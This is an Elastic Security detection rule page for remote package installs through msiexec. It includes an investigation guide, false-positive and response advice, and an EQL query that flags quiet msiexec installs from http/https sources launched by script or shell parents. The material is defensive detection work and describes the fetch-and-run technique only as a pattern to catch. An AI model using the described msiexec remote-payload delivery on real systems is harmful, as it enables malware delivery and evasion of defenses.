--- title: Potential Remote Install via MsiExec description: Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of... url: https://www.elastic.co/elastic/docs-builder/docs/3466/reference/security/prebuilt-rules/rules/windows/defense_evasion_msiexec_remote_payload products: - Elastic Security --- # Potential Remote Install via MsiExec Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. **Rule type**: eql **Rule indices**: - endgame-* - logs-crowdstrike.fdr* - logs-endpoint.events.process-* - logs-m365_defender.event-* - logs-sentinel_one_cloud_funnel.* - logs-system.security* - logs-windows.forwarded* - logs-windows.sysmon_operational-* - winlogbeat-* **Rule Severity**: high **Risk Score**: 73 **Runs every**: **Searches indices from**: `now-9m` **Maximum alerts per execution**: 100 **References**: **Tags**: - Domain: Endpoint - OS: Windows - Use Case: Threat Detection - Tactic: Defense Evasion - Data Source: Elastic Endgame - Data Source: Elastic Defend - Data Source: Windows Security Event Logs - Data Source: Microsoft Defender XDR - Data Source: Sysmon - Data Source: SentinelOne - Data Source: Crowdstrike - Resources: Investigation Guide **Version**: 5 **Rule authors**: - Elastic **Rule license**: Elastic License v2 ## Setup This rule is designed for data generated by [Elastic Defend](https://www.elastic.co/security/endpoint-security), which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. Setup instructions: [https://ela.st/install-elastic-defend](https://ela.st/install-elastic-defend) ### Additional data sources This rule also supports the following third-party data sources. For setup instructions, refer to the links below: - [CrowdStrike](https://ela.st/crowdstrike-integration) - [Microsoft Defender XDR](https://ela.st/m365-defender) - [SentinelOne Cloud Funnel](https://ela.st/sentinel-one-cloud-funnel) - [Sysmon Event ID 1 - Process Creation](https://ela.st/sysmon-event-1-setup) - [Windows Process Creation Logs](https://ela.st/audit-process-creation) ## Investigation guide ## Triage and analysis ### Investigating Potential Remote Install via MsiExec #### Possible investigation steps - What remote installer behavior is preserved in the alert? - Focus: `process.command_line`, `process.parent.name`, and `process.parent.command_line`, especially quiet install or patch switches, the remote MSI or `TRANSFORMS=` source, and HTTP, raw-IP, public-hosting, or recognized distribution sources. - Implication: escalate for quiet remote installs, remote MSTs, or patches from suspicious infrastructure under interactive or script-launcher parents; lower concern only when the command, source, and parent match one recurring deployment, repair, or onboarding pattern. - Is the msiexec binary identity expected for Windows Installer? - Focus: `process.executable`, `process.pe.original_file_name`, `process.code_signature.subject_name`, `process.code_signature.trusted`, and `process.hash.sha256`. - Implication: escalate faster when msiexec is renamed, unsigned, untrusted, newly seen, or in a user-writable path; trusted Microsoft identity only confirms the proxy binary, not the remote install. - Does the parent and ancestry explain why msiexec ran? - Focus: `process.parent.executable`, `process.parent.command_line`, `process.Ext.ancestry`, `user.id`, and the affected host. - Implication: escalate when browser-adjacent, script, shell, WMI, or unusual interactive ancestry invokes the remote package without a stable workflow; lower concern when the parent, user, and host pattern fits a recognized management or support path. - Do process events show payload execution after the installer starts? - Focus: child starts on the same `host.id` where `process.parent.entity_id` matches `process.entity_id`, checking child `process.command_line`, `process.executable`, and `process.hash.sha256`. $investigate_0 - Hint: use `host.id` + `process.pid` + tight alert window only when entity linkage is unavailable, and treat the result as weaker. - Implication: escalate when msiexec spawns shells, script interpreters, LOLBins, scheduled-task tools, or user-space binaries tied to the remote package; lower concern when follow-on activity stays inside the same signed product install flow. - Does the remote source and workflow context fit one legitimate package path? - Focus: URL, host, package name, or remote `TRANSFORMS=` in `process.command_line`, plus `process.parent.executable`, `user.id`, and `host.id` context for that source. - Hint: if network or file telemetry exists, correlate destination or artifact evidence with `host.id` + `process.entity_id`; use `host.id` + `process.pid` + tight alert window only without entity linkage. Missing file or network telemetry is unresolved, not benign, and does not block escalation when process evidence is strong. $investigate_1 - Implication: escalate when the source is raw IPs, public file hosting, look-alike vendors, temp/download staging, or infrastructure unrelated to the expected product; lower concern when source, launcher, user-host scope, and recovered corroboration fit one internal distribution point or vendor service. - Escalate on suspicious quiet-install intent, mismatched identity or lineage, unfit package source, or payload child execution; close only when process evidence and recovered corroboration align to one exact deployment, repair, or support workflow; preserve and escalate when evidence is mixed or visibility is incomplete. Use same-user or same-host related alerts after escalation only to size scope, not prove the local alert. $investigate_2 $investigate_3 ### False positive analysis - First check whether `http:` or `https:` follows `/i` or `/p` directly (remote source -- investigate) or sits inside a `PROPERTY=` value while the MSI source is local or relative (configuration URL -- likely benign). The rule excludes local `C:\` sources after `/i`; UNC, relative-path, or other local sources with property URLs need manual confirmation or customer-side exceptions. - Legitimate deployment, patching, or agent-repair workflows can use quiet remote msiexec. Confirm when `process.command_line`, `process.parent.executable`, `user.id`, and `host.id` align to one recurring product path. Do not close on a vendor-looking URL, signed msiexec, or familiar parent name alone. - Build exceptions from `process.parent.executable`, package source pattern in `process.command_line`, and stable `host.id` or `user.id` cohort. Avoid exceptions on msiexec, `process.parent.name`, domain suffix, or `user.name` alone. ### Response and remediation - If confirmed benign, reverse any temporary containment and record the installer command, remote package source, parent launcher, signer/hash identity, affected `user.id`, affected `host.id`, and any recovered destination or artifact pattern. Create an exception only after the same workflow recurs across prior alerts from this rule. - If suspicious but unconfirmed, preserve the alert record, process tree, `process.entity_id` values, installer command line, remote URL or `TRANSFORMS=` value, parent command line, child process records, and any recovered package, destination, or provenance artifacts before containment. Apply reversible controls only when command, parent, or child-process evidence suggests active delivery; otherwise keep evidence collection open rather than starting cleanup. - If confirmed malicious, preserve process identifiers, command lines, recovered packages, and destination indicators before isolating the host, terminating msiexec or follow-on payloads, blocking confirmed indicators, or removing staged installers, extracted payloads, persistence changes, or scheduled-task material tied to the chain. - Post-incident hardening: close the delivery path that introduced the remote package, restrict msiexec remote-install use to controlled deployment tooling where feasible, review hosts where installer-elevation policy would increase impact, and document adjacent variants such as remote `TRANSFORMS=` abuse or DLL registration through `/y` and `/z`. ## Rule Query ```eql process where host.os.type == "windows" and event.type == "start" and process.name : "msiexec.exe" and process.args : ("-i*", "/i*", "-p*", "/p*") and process.command_line : ("*http:*", "*https:*") and process.args : ("/qn", "-qn", "-q", "/q", "/quiet") and process.parent.name : ( "sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe", "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe" ) and not process.command_line : ( "*--set-server=*", "*UPGRADEADD=*" , "*--url=*", "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*", "*app.ninjarmm.com*", "*zoom.us/client*", "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*", "*awscli.amazonaws.com*", "*/i \"C:*", "*/i C:\\*" ) ``` **Framework:** MITRE ATT&CK - Tactic: - Name: Defense Evasion - Id: TA0005 - Reference URL: [[https://attack.mitre.org/tactics/TA0005/](https://attack.mitre.org/tactics/TA0005/)](https://attack.mitre.org/tactics/TA0005/) - Technique: - Name: System Binary Proxy Execution - Id: T1218 - Reference URL: [[https://attack.mitre.org/techniques/T1218/](https://attack.mitre.org/techniques/T1218/)](https://attack.mitre.org/techniques/T1218/) - Sub Technique: - Name: Msiexec - Id: T1218.007 - Reference URL: [[https://attack.mitre.org/techniques/T1218/007/](https://attack.mitre.org/techniques/T1218/007/)](https://attack.mitre.org/techniques/T1218/007/) **Framework:** MITRE ATT&CK - Tactic: - Name: Command and Control - Id: TA0011 - Reference URL: [[https://attack.mitre.org/tactics/TA0011/](https://attack.mitre.org/tactics/TA0011/)](https://attack.mitre.org/tactics/TA0011/) - Technique: - Name: Ingress Tool Transfer - Id: T1105 - Reference URL: [[https://attack.mitre.org/techniques/T1105/](https://attack.mitre.org/techniques/T1105/)](https://attack.mitre.org/techniques/T1105/)